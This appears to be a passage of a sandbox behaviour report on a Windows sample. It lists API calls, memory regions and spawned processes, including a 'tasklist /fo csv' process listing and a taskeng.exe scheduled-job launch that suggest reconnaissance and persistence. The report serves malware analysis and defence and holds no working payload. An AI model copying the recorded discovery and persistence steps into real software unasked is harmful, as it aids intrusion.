[0417.896] memcpy (in: _Dst=0x12d8f0, _Src=0x12cd40, _Size=0xb9e | out: _Dst=0x12d8f0) returned 0x12d8f0
[0417.896] FreeEnvironmentStringsW (penv=0x12cd40) returned 1
[0417.896] GetProcessHeap () returned 0x110000
[0417.896] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x128640 | out: hHeap=0x110000) returned 1
[0417.896] DeleteProcThreadAttributeList (in: lpAttributeList=0x30ee18 | out: lpAttributeList=0x30ee18)
[0417.896] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0417.900] _close (_FileHandle=3) returned 0
[0417.901] _get_osfhandle (_FileHandle=1) returned 0x7
[0417.901] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0417.901] _get_osfhandle (_FileHandle=1) returned 0x7
[0417.901] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1fe194 | out: lpMode=0x4a1fe194) returned 1
[0417.902] _get_osfhandle (_FileHandle=0) returned 0x3
[0417.902] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1fe198 | out: lpMode=0x4a1fe198) returned 1
[0417.903] SetConsoleInputExeNameW () returned 0x1
[0417.903] GetConsoleOutputCP () returned 0x1b5
[0417.903] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a20bfe0 | out: lpCPInfo=0x4a20bfe0) returned 1
[0417.903] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0417.904] exit (_Code=0)
Process:
id = "24"
image_name = "tasklist.exe"
filename = "c:\\windows\\system32\\tasklist.exe"
page_root = "0x225b5000"
os_pid = "0xe68"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "23"
os_parent_pid = "0xdb8"
cmd_line = "tasklist /fo csv "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 3173
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 3174
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 3175
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 3176
start_va = 0x150000
end_va = 0x1cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 3177
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 3178
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 3179
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 3180
start_va = 0xffbe0000
end_va = 0xffbfdfff
monitored = 0
entry_point = 0xffbf36e4
region_type = mapped_file
name = "tasklist.exe"
filename = "\\Windows\\System32\\tasklist.exe" (normalized: "c:\\windows\\system32\\tasklist.exe")
Region:
id = 3181
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 3182
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 3183
start_va = 0x7fffffdc000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 3184
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 3185
start_va = 0x1d0000
end_va = 0x34ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 3186
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 3187
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 3188
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 3189
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 3190
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 3191
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 3192
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 3200
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 3201
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 3202
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 3203
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 3204
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 3205
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 3206
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 3207
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 3208
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 3209
start_va = 0x7fefc990000
end_va = 0x7fefc99bfff
monitored = 0
entry_point = 0x7fefc991064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 3210
start_va = 0x7fefb1b0000
end_va = 0x7fefb1c7fff
monitored = 0
entry_point = 0x7fefb1b1010
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 3211
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 3212
start_va = 0x7fefd660000
end_va = 0x7fefd66afff
monitored = 0
entry_point = 0x7fefd661030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 3213
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 3214
start_va = 0x7feffa10000
end_va = 0x7feffa5cfff
monitored = 0
entry_point = 0x7feffa11070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 3215
start_va = 0x7feff540000
end_va = 0x7feff547fff
monitored = 0
entry_point = 0x7feff541504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 3216
start_va = 0x7fef4dd0000
end_va = 0x7fef4e12fff
monitored = 0
entry_point = 0x7fef4df1b50
region_type = mapped_file
name = "framedynos.dll"
filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")
Region:
id = 3217
start_va = 0x7fefba20000
end_va = 0x7fefba35fff
monitored = 0
entry_point = 0x7fefba211a0
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 3218
start_va = 0x7fefba10000
end_va = 0x7fefba1bfff
monitored = 0
entry_point = 0x7fefba118a4
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 3219
start_va = 0x7fefd5c0000
end_va = 0x7fefd5e2fff
monitored = 0
entry_point = 0x7fefd5c1198
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 3220
start_va = 0x7fefb9f0000
end_va = 0x7fefba04fff
monitored = 0
entry_point = 0x7fefb9f1050
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 3221
start_va = 0x7fef3c30000
end_va = 0x7fef3d54fff
monitored = 0
entry_point = 0x7fef3c81570
region_type = mapped_file
name = "dbghelp.dll"
filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll")
Region:
id = 3222
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 3223
start_va = 0x350000
end_va = 0x4affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000350000"
filename = ""
Region:
id = 3224
start_va = 0x350000
end_va = 0x44ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000350000"
filename = ""
Region:
id = 3225
start_va = 0x4a0000
end_va = 0x4affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004a0000"
filename = ""
Region:
id = 3226
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3227
start_va = 0x4b0000
end_va = 0x637fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004b0000"
filename = ""
Region:
id = 3228
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3229
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3230
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 3231
start_va = 0x640000
end_va = 0x7c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000640000"
filename = ""
Region:
id = 3232
start_va = 0x7d0000
end_va = 0x1bcffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007d0000"
filename = ""
Region:
id = 3233
start_va = 0xc0000
end_va = 0xc3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tasklist.exe.mui"
filename = "\\Windows\\System32\\en-US\\tasklist.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\tasklist.exe.mui")
Region:
id = 3234
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 3235
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 3236
start_va = 0x1bd0000
end_va = 0x1d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001bd0000"
filename = ""
Region:
id = 3237
start_va = 0x1bd0000
end_va = 0x1c8ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 3238
start_va = 0x1c90000
end_va = 0x1d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c90000"
filename = ""
Region:
id = 3239
start_va = 0x1d0000
end_va = 0x24cfff
monitored = 0
entry_point = 0x1dcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 3240
start_va = 0x250000
end_va = 0x34ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 3241
start_va = 0x1d0000
end_va = 0x24cfff
monitored = 0
entry_point = 0x1dcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 3242
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 3243
start_va = 0x1ec0000
end_va = 0x1f3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ec0000"
filename = ""
Region:
id = 3244
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 3245
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 3246
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 3247
start_va = 0x100000
end_va = 0x100fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 3248
start_va = 0x7fef9bd0000
end_va = 0x7fef9bddfff
monitored = 0
entry_point = 0x7fef9bd5500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 3249
start_va = 0x7fef9e70000
end_va = 0x7fef9ee6fff
monitored = 0
entry_point = 0x7fef9eae7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 3250
start_va = 0x7fefd230000
end_va = 0x7fefd251fff
monitored = 0
entry_point = 0x7fefd235d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 3251
start_va = 0x7fefd770000
end_va = 0x7fefd7acfff
monitored = 0
entry_point = 0x7fefd7718f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 3252
start_va = 0x1f40000
end_va = 0x220efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 3253
start_va = 0x1d0000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 3254
start_va = 0x7fefd0c0000
end_va = 0x7fefd0d7fff
monitored = 0
entry_point = 0x7fefd0c3b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 3255
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 3256
start_va = 0x450000
end_va = 0x494fff
monitored = 0
entry_point = 0x451064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3257
start_va = 0x450000
end_va = 0x494fff
monitored = 0
entry_point = 0x451064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3258
start_va = 0x450000
end_va = 0x494fff
monitored = 0
entry_point = 0x451064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3259
start_va = 0x450000
end_va = 0x494fff
monitored = 0
entry_point = 0x451064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3260
start_va = 0x450000
end_va = 0x494fff
monitored = 0
entry_point = 0x451064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3261
start_va = 0x7fefcdc0000
end_va = 0x7fefce06fff
monitored = 0
entry_point = 0x7fefcdc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3262
start_va = 0x7fefd7b0000
end_va = 0x7fefd7c3fff
monitored = 0
entry_point = 0x7fefd7b10e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 3263
start_va = 0x2230000
end_va = 0x22affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002230000"
filename = ""
Region:
id = 3264
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 3265
start_va = 0x2330000
end_va = 0x23affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002330000"
filename = ""
Region:
id = 3266
start_va = 0x7fffffd4000
end_va = 0x7fffffd5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 3267
start_va = 0x7fef98f0000
end_va = 0x7fef9902fff
monitored = 0
entry_point = 0x7fef98f1d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 3268
start_va = 0x7fef9c10000
end_va = 0x7fef9ce2fff
monitored = 0
entry_point = 0x7fef9c88b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 3269
start_va = 0x7fef9be0000
end_va = 0x7fef9c06fff
monitored = 0
entry_point = 0x7fef9be11a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 3689
start_va = 0x7fef97d0000
end_va = 0x7fef97f0fff
monitored = 0
entry_point = 0x7fef97e03b0
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 3690
start_va = 0x110000
end_va = 0x114fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wmiutils.dll.mui"
filename = "\\Windows\\System32\\wbem\\en-US\\wmiutils.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\wmiutils.dll.mui")
Thread:
id = 143
os_tid = 0xec0
Thread:
id = 144
os_tid = 0xed8
Thread:
id = 145
os_tid = 0xed4
Thread:
id = 146
os_tid = 0xec8
Thread:
id = 147
os_tid = 0xea4
Process:
id = "25"
image_name = "taskeng.exe"
filename = "c:\\windows\\system32\\taskeng.exe"
page_root = "0x792dd000"
os_pid = "0x4fc"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "created_scheduled_job"
parent_id = "13"
os_parent_pid = "0x370"
cmd_line = "taskeng.exe {58CB376B-B7C1-4AA2-A22D-0FDB9D0F5A07} S-1-5-21-4219442223-4223814209-3835049652-1000:Q9IATRKPRH\\kEecfMwgj:Interactive:LUA[1]"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f7b2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 3808
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 3809
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 3810
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 3811
start_va = 0x130000
end_va = 0x1affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 3812
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 3813
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 3814
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 3815
start_va = 0xffa60000
end_va = 0xffad3fff
monitored = 0
entry_point = 0xffa6f44c
region_type = mapped_file
name = "taskeng.exe"
filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe")
Region:
id = 3816
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 3817
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 3818
start_va = 0x7fffffd9000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 3819
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 3947
start_va = 0x1b0000
end_va = 0x36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 3948
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 3949
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 3950
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 3951
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 3952
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 3953
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 3954
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 3955
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 3956
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 3957
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 3958
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
